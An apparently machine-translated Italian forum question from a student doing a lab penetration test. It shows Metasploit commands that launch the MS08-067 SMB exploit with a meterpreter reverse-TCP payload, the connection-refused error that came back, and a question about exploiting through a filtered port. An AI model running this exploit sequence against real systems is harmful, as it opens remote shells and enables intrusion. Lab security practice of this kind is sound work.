Sto facendo un pentecoste contro una macchina che il docente ha allestito in laboratorio. NMAP mostra la porta 445 da filtrare e Nessus conferma che la vulnerabilità ms08_067 è presente su quella macchina.
Ho provato a eseguire Metasploit contro di esso nel modo normale:
use exlpoit/windows/smb/ms08_067_netapi
set RHOST TARGET_IP
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST MY_IP
exploit
Mi dice:
[-] Exploit failed [unreachable]: Rex::ConnectionRefused The connection was refused by the remote host (192.168.2.2:445)
Suppongo che l'exploit stia fallendo perché la porta 445 viene filtrata. La cosa che mi ha confuso è che Nessus può apparentemente controllare che la vulnerabilità sia presente. Poiché Nessus può farlo attraverso la porta filtrata, c'è un modo in cui posso lanciare l'exploit attraverso una porta filtrata? Ci sono impostazioni Metasploit che devono essere organizzate?